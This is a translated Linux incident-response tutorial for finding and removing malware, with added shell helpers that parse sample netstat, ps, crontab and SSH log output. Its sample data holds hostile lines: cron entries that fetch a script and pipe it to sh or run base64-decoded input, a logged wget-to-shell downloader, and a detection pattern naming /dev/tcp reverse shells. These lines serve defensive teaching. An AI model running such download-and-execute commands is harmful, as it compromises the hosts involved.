2025-01-19 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article introduces practical Linux emergency response skills and is written as a reference for interested readers. I hope you gain a lot from it. Let's take a look.
Overview
Emergency response on Linux is often harder than on Windows: there are no ready-made response tools such as Autoruns and Process Explorer (procexp), and there is no single, unified response procedure. This article therefore lays out an emergency response process for the Linux environment and gives the shell commands used at each stage, so that malware on Linux can be handled quickly and systematically.
Linux emergency response breaks down into four stages: identify the symptoms -> remove the malware -> close the loop on persistence -> harden the system.
First, start from the abnormal behaviour the user observed on the host and identify the symptoms that point to malware.
Then locate the specific malicious process and its files, and remove them.
Completing the first two steps is not enough: malware usually re-infects the host through autostart entries and guardian (daemon) processes, so we close the loop to make sure it cannot recreate itself.
Once the malicious items on the host are cleaned up, the system is hardened so the malware cannot intrude again over the network.
After these four stages the emergency response can be considered complete.
Identify the symptoms
The first step is to find the abnormal behaviour on the host and confirm suspicious malware activity from the system's running state and from security appliance alerts.
Is system CPU usage abnormal?
Enumerate processes, sorted by CPU usage descending: top
If an unfamiliar process is consistently using more than 70% CPU, it is very likely a cryptomining trojan. Some miners throttle themselves or hide from top through a preloaded library, so a low reading does not rule one out.
Are there suspicious processes?
Enumerate process command lines: ps aux
Malware usually carries a telltale command line. When you see odd strings such as a URL on a command line, be alert: it is probably a malware downloader.
Is there an alert on the security gateway?
An alert from the security gateway is the most direct way to identify the threat, but confirming that the host is infected is only the first step; next we need to locate which process is communicating with the C2 (command and control) server.
Monitor for processes communicating with the target IP (on hosts without netstat, ss -antp prints the same information):
while true; do netstat -antp | grep [ip]; sleep 1; done
Sometimes the security gateway reports a domain name rather than an IP address. Because the IP behind the domain changes, the loop above cannot be used directly.
In that case, first add an entry to /etc/hosts that resolves the malicious domain to a fixed address of your choosing (one you control, or one that is unroutable), then monitor connections to that address with the same loop.
The process that connects to it is the malicious one.
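The two steps above (pick the PID out of netstat output for a given C2 address, and pin a reported domain to a sinkhole address) as a worked example. This is an added example, not code from the original article; the netstat snapshot, IPs, PIDs, program names, the domain evil.example and the sinkhole address 198.51.100.254 are all constructed for it.

```shell
#!/bin/sh
# Added example, not from the original article: find the process behind a C2
# connection from `netstat -antp` output, and build the /etc/hosts sinkhole entry
# used when the gateway only reports a domain name. All IPs, PIDs and program
# names below are constructed for the example.

# Constructed snapshot in the format `netstat -antp` prints (columns: Proto, Recv-Q,
# Send-Q, Local Address, Foreign Address, State, PID/Program name).
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 10.0.0.5:47312          203.0.113.9:8000        ESTABLISHED 4217/.kthreadd
tcp        0      0 10.0.0.5:47318          198.51.100.20:443       ESTABLISHED 3980/curl
tcp        0      0 10.0.0.5:47330          203.0.113.9:8000        SYN_SENT    4217/.kthreadd'

# pids_talking_to <ip>: read netstat -antp output on stdin and print each unique
# "PID/program" whose foreign address is <ip>, in any state. A miner whose C2 is
# being blocked sits in SYN_SENT rather than ESTABLISHED, so do not filter on state.
pids_talking_to() {
    awk -v ip="$1" '
        $1 ~ /^(tcp|udp)/ {
            n = split($5, fa, ":")       # Foreign Address is "ip:port" (IPv4 only here)
            if (n == 2 && fa[1] == ip && $NF ~ /^[0-9]+\//) print $NF
        }' | sort -u
}

# sinkhole_entry <domain> [ip]: print the /etc/hosts line that pins <domain> to a fixed
# address so the loop below can watch for it (append it with >> /etc/hosts). The default
# 198.51.100.254 is an assumed unroutable documentation address; use one you control
# if you want to capture the traffic.
sinkhole_entry() {
    printf '%s %s\n' "${2:-198.51.100.254}" "$1"
}

# monitor_c2 <ip>: the live version of the page's loop, not run here. Needs root for
# the PID column; `ss -antp` is the drop-in replacement on hosts without netstat.
monitor_c2() {
    while :; do
        netstat -antp 2>/dev/null | pids_talking_to "$1"
        sleep 1
    done
}

printf '%s\n' "$SAMPLE_NETSTAT" | pids_talking_to 203.0.113.9   # 4217/.kthreadd
sinkhole_entry evil.example
```

The process name ".kthreadd" in the sample is typical camouflage: a real kthreadd has PID 2 and no network sockets, so a userland process with that name talking to port 8000 is exactly what this stage is looking for.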
Are there suspicious commands in the history?
Go through the host's command history for malicious commands: history
Note that history only covers the current user's shell; also check each user's ~/.bash_history, and bear in mind that attackers often clear it.
Remove the malware
The process information gathered in the first stage lets us locate the malicious process and its files and clean them up.
Kill the malicious process
Trace the process chain of the suspicious process, then kill it. Kill the guardian parent together with its children, otherwise the child is simply respawned (sending SIGSTOP to the whole tree first prevents that race):
ps -elf | grep [pid]
kill -9 [pid]
Delete the malicious files
Locate the file behind the malicious process and delete it. If the link target ends in (deleted), the malware removed its own binary after starting; copy /proc/[pid]/exe out first if you need a sample, and also look at the process's working directory and open files:
ls -al /proc/[pid]/exe
rm -f [exe_path]
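The "kill the process chain, then recover the binary" step as a worked example. This is an added example, not code from the original article: the ps snapshot and its PIDs and names are constructed, and the sample directory /root/ir_samples is an assumption.

```shell
#!/bin/sh
# Added example, not from the original article: work out which processes to kill from
# a `ps -eo pid,ppid,comm` snapshot, then (live helpers, not run here) grab the binary
# behind each PID before killing it. The snapshot below is constructed.

SAMPLE_PS='  PID  PPID COMMAND
    1     0 systemd
  812     1 sshd
 3101   812 bash
 4217  3101 .kthreadd
 4390  4217 sh
 4391  4390 wget'

# ancestors <pid>: print "pid/comm" from <pid> up to PID 1 so you can see who started
# the suspicious process (a real kthreadd is a child of PID 0, never of a shell).
ancestors() {
    awk -v target="$1" '
        $1 ~ /^[0-9]+$/ { ppid[$1] = $2; comm[$1] = $3 }
        END {
            p = target; out = ""
            while (p in comm) {
                out = out (out == "" ? "" : " ") p "/" comm[p]
                if (p == "1") break
                p = ppid[p]
            }
            print out
        }'
}

# descendants <pid>: print <pid> and every process under it, breadth first. A guardian
# respawns its worker when the worker dies, so the whole subtree has to go together.
descendants() {
    awk -v target="$1" '
        $1 ~ /^[0-9]+$/ { kids[$2] = kids[$2] " " $1 }
        END {
            queue = target; out = ""
            while (queue != "") {
                n = split(queue, q, " "); queue = ""
                for (i = 1; i <= n; i++) {
                    out = out (out == "" ? "" : " ") q[i]
                    queue = queue kids[q[i]]
                }
            }
            print out
        }'
}

# exe_path <pid>: live helper. /proc/<pid>/exe still resolves when the malware unlinked
# its binary after starting; the link text then ends in "(deleted)".
exe_path() {
    readlink "/proc/$1/exe" 2>/dev/null
}

# stop_and_kill <pid>: live helper, not run here. Freeze the whole tree first so the
# guardian cannot respawn the worker between kills, save a copy of each binary (cp of
# /proc/<pid>/exe works even for a deleted file), then kill everything.
stop_and_kill() {
    pids=$(ps -eo pid=,ppid=,comm= | descendants "$1")
    mkdir -p /root/ir_samples                       # assumed evidence directory
    for p in $pids; do kill -STOP "$p" 2>/dev/null; done
    for p in $pids; do
        cp "/proc/$p/exe" "/root/ir_samples/$p.bin" 2>/dev/null
        echo "$p $(exe_path "$p")"
    done
    for p in $pids; do kill -9 "$p" 2>/dev/null; done
}

printf '%s\n' "$SAMPLE_PS" | ancestors 4391     # 4391/wget 4390/sh 4217/.kthreadd 3101/bash 812/sshd 1/systemd
printf '%s\n' "$SAMPLE_PS" | descendants 4217   # 4217 4390 4391
```

Feed the two awk helpers a live snapshot with `ps -eo pid,ppid,comm | ancestors <pid>`; the ancestor chain in the sample (wget under sh under a fake kthreadd under an interactive bash) is the downloader pattern the previous stage flagged from the command line.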
Close the loop on persistence
Malware on Linux has fewer persistence mechanisms than on Windows; the main ones are the following.
Check for suspicious scheduled tasks
Enumerate cron jobs: crontab -l
crontab -l only shows the current user's crontab; also check /var/spool/cron (or /var/spool/cron/crontabs on Debian-based systems), /etc/crontab, /etc/cron.d and the /etc/cron.hourly, daily, weekly and monthly directories.
View anacron asynchronous scheduled tasks: cat /etc/anacrontab
On systemd hosts, list timers as well: systemctl list-timers --all
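Cron is the persistence mechanism most often found on infected Linux hosts, so here is a worked example of enumerating every cron source and flagging the entries worth a closer look. This is an added example, not code from the original article; the crontab text, IP and paths in it are constructed, and the indicator list is an assumption to be tuned for your own fleet.

```shell
#!/bin/sh
# Added example, not from the original article: gather every place cron jobs can hide
# (live helper, not run here) and flag entries with download-and-execute or other
# indicators. SAMPLE_CRON is constructed; the URL, IP and paths in it are made up.

SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (curl -fsSL http://203.0.113.9:8000/i.sh || wget -q -O- http://203.0.113.9:8000/i.sh) | sh
@reboot /tmp/.X11-unix/.sysupd
*/5 * * * * echo Y2QgL3RtcDs= | base64 -d | bash
30 2 * * 0 /usr/local/bin/backup.sh'

# Indicators that are almost never legitimate in a cron job (assumption: tune per fleet):
# a downloader piped into a shell, base64 decoding, binaries in world-writable
# directories, and bash's /dev/tcp pseudo-device (reverse shells).
CRON_IOCS='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/tmp/|/dev/shm/|/var/tmp/|/dev/tcp/'

# flag_cron_entries: read crontab text on stdin, drop comments and blank lines, and
# print the entries that match CRON_IOCS.
flag_cron_entries() {
    grep -E -v '^[[:space:]]*(#|$)' | grep -E -e "$CRON_IOCS"
}

# all_cron_sources: live helper. crontab -l covers only the current user; this prints
# every cron source on the host with a "file: " prefix so a hit can be traced back,
# then lists systemd timers, which deserve the same look.
all_cron_sources() {
    for f in /etc/crontab /etc/anacrontab /etc/cron.d/* /etc/cron.hourly/* \
             /etc/cron.daily/* /etc/cron.weekly/* /etc/cron.monthly/* \
             /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] && sed "s|^|$f: |" "$f"
    done
    command -v systemctl >/dev/null 2>&1 && systemctl list-timers --all --no-pager
}

printf '%s\n' "$SAMPLE_CRON" | flag_cron_entries   # prints the three suspicious entries
```

On a live host run `all_cron_sources | flag_cron_entries`; the prefix tells you which file to clean, and the @reboot entry pointing into /tmp is the form a dropped miner most often takes.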
Check for suspicious services
Enumerate all services on the host and look for malicious ones (on systemd hosts use systemctl list-unit-files --type=service --state=enabled as well):
service --status-all
Check whether system files have been hijacked
List files in the system binary directories that were modified within the last 7 days, sorted by modification time. On RPM-based systems rpm -Va, and on Debian-based systems debsums, will also compare the installed binaries against the package database:
find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime -7 | xargs ls -lat
Check for a malware guardian (daemon) process
Monitor what the daemon is doing: lsof -p [pid]
strace -tt -T -e trace=all -p [pid]
Scan for malicious kernel modules (drivers)
Enumerate loaded kernel modules: lsmod
A kernel rootkit can unlink itself from this list, so cross-check against the directories under /sys/module and run the rootkit scanners below.
Install chkrootkit and scan:
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
tar zxvf chkrootkit.tar.gz
cd chkrootkit-0.52
make sense
./chkrootkit
Install rkhunter and scan:
wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz
tar -zxvf rkhunter-1.4.4.tar.gz
cd rkhunter-1.4.4
./installer.sh --install
rkhunter -c
Harden the system
This last stage is easy to forget. Around 90% of Linux malware spreads over the network, so in most cases a host is infected because it lacks basic network-facing protection; check the following quickly.
Change weak SSH passwords
Query the host's login log (/var/log/secure on RHEL and CentOS; Debian and Ubuntu write the same lines to /var/log/auth.log):
grep "Accepted" /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'
Locate the source IPs of the brute-force attempts:
grep "Failed password" /var/log/secure | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" | sort | uniq -c | sort -nr
Usernames targeted by the brute-force attempts:
grep "Failed password" /var/log/secure | perl -e 'while ($_ = <>) { /for (.*?) from/; print "$1\n"; }' | sort | uniq -c | sort -nr
SSH brute forcing is the most common way Linux malware spreads. A host with a weak password is easily brute-forced over SSH by other infected hosts, and will simply be re-infected.
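The log triage above as a worked example, going one step further than the page's one-liners: besides counting failures per IP and per user, it reports the source addresses that failed and then succeeded, which is the evidence that a weak password was actually exploited. This is an added example, not code from the original article; the log lines, hostnames and IPs are constructed in /var/log/secure format.

```shell
#!/bin/sh
# Added example, not from the original article: triage sshd brute-force activity from
# auth-log lines. SAMPLE_AUTH is constructed in /var/log/secure format (Debian and
# Ubuntu write the same lines to /var/log/auth.log); hosts and IPs are made up.

SAMPLE_AUTH='Oct 28 17:02:11 web01 sshd[2201]: Failed password for root from 203.0.113.9 port 51112 ssh2
Oct 28 17:02:13 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.9 port 51114 ssh2
Oct 28 17:02:14 web01 sshd[2201]: Failed password for invalid user oracle from 203.0.113.9 port 51116 ssh2
Oct 28 17:02:15 web01 sshd[2203]: Failed password for root from 198.51.100.77 port 40022 ssh2
Oct 28 17:02:16 web01 sshd[2203]: Failed password for root from 198.51.100.77 port 40023 ssh2
Oct 28 17:05:34 web01 sshd[2210]: Accepted password for root from 203.0.113.9 port 51140 ssh2
Oct 28 17:09:01 web01 sshd[2250]: Accepted publickey for deploy from 10.0.0.7 port 38800 ssh2'

# failed_by_ip: "count ip" for every source of failed passwords, most active first.
# The sort before uniq -c matters: uniq only merges adjacent identical lines.
failed_by_ip() {
    awk '/Failed password/ { for (i = 1; i <= NF; i++) if ($i == "from") print $(i+1) }' \
        | sort | uniq -c | sort -k1,1nr -k2 | awk '{ print $1, $2 }'
}

# failed_by_user: "count user" for the accounts that were guessed. The "invalid user"
# prefix is stripped so existing and non-existent accounts are counted the same way.
failed_by_user() {
    sed -n 's/.*Failed password for \(invalid user \)\{0,1\}\([^ ]*\) from.*/\2/p' \
        | sort | uniq -c | sort -k1,1nr -k2 | awk '{ print $1, $2 }'
}

# accepted_logins: "date time user ip method" for successful logins, the same fields the
# page's awk prints plus the auth method (a password success on a key-only box stands out).
accepted_logins() {
    awk '$6 == "Accepted" { print $1, $2, $3, $9, $11, $7 }'
}

# brute_force_successes: IPs that failed at least once and also have an "Accepted" line.
# This decides whether the weak password was merely attacked or actually used.
brute_force_successes() {
    awk '
        /Failed password/ { for (i = 1; i <= NF; i++) if ($i == "from") failed[$(i+1)] = 1 }
        /Accepted/        { for (i = 1; i <= NF; i++) if ($i == "from") accepted[$(i+1)] = 1 }
        END { for (ip in failed) if (ip in accepted) print ip }' | sort
}

printf '%s\n' "$SAMPLE_AUTH" | brute_force_successes   # 203.0.113.9
```

On a live host replace the printf with `cat /var/log/secure*` (or `journalctl -u sshd --no-pager` on systemd-only hosts). Any IP printed by brute_force_successes means the account it logged into needs its password changed and its activity reviewed, not just the brute-force source blocked.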
Add command auditing
Record the login IP address, execution time and user for each command in the history:
[1] Keep 10,000 commands:
sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile
[2] Append the following configuration to the end of /etc/profile:
USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`
if [ "$USER_IP" = "" ]; then
    USER_IP=`hostname`
fi
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "
shopt -s histappend
export PROMPT_COMMAND="history -a"
[3] Apply the configuration:
source /etc/profile
The resulting history entries look like this:
76  2019-10-28 17:05:34 113.110.229.230 wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
Patch common Web vulnerabilities
Struts2 series RCE vulnerabilities
Redis unauthorized access
Confluence RCE (CVE-2019-3396)
Drupal RCE (CVE-2018-7600)
ThinkPHP RCE (CVE-2019-9082)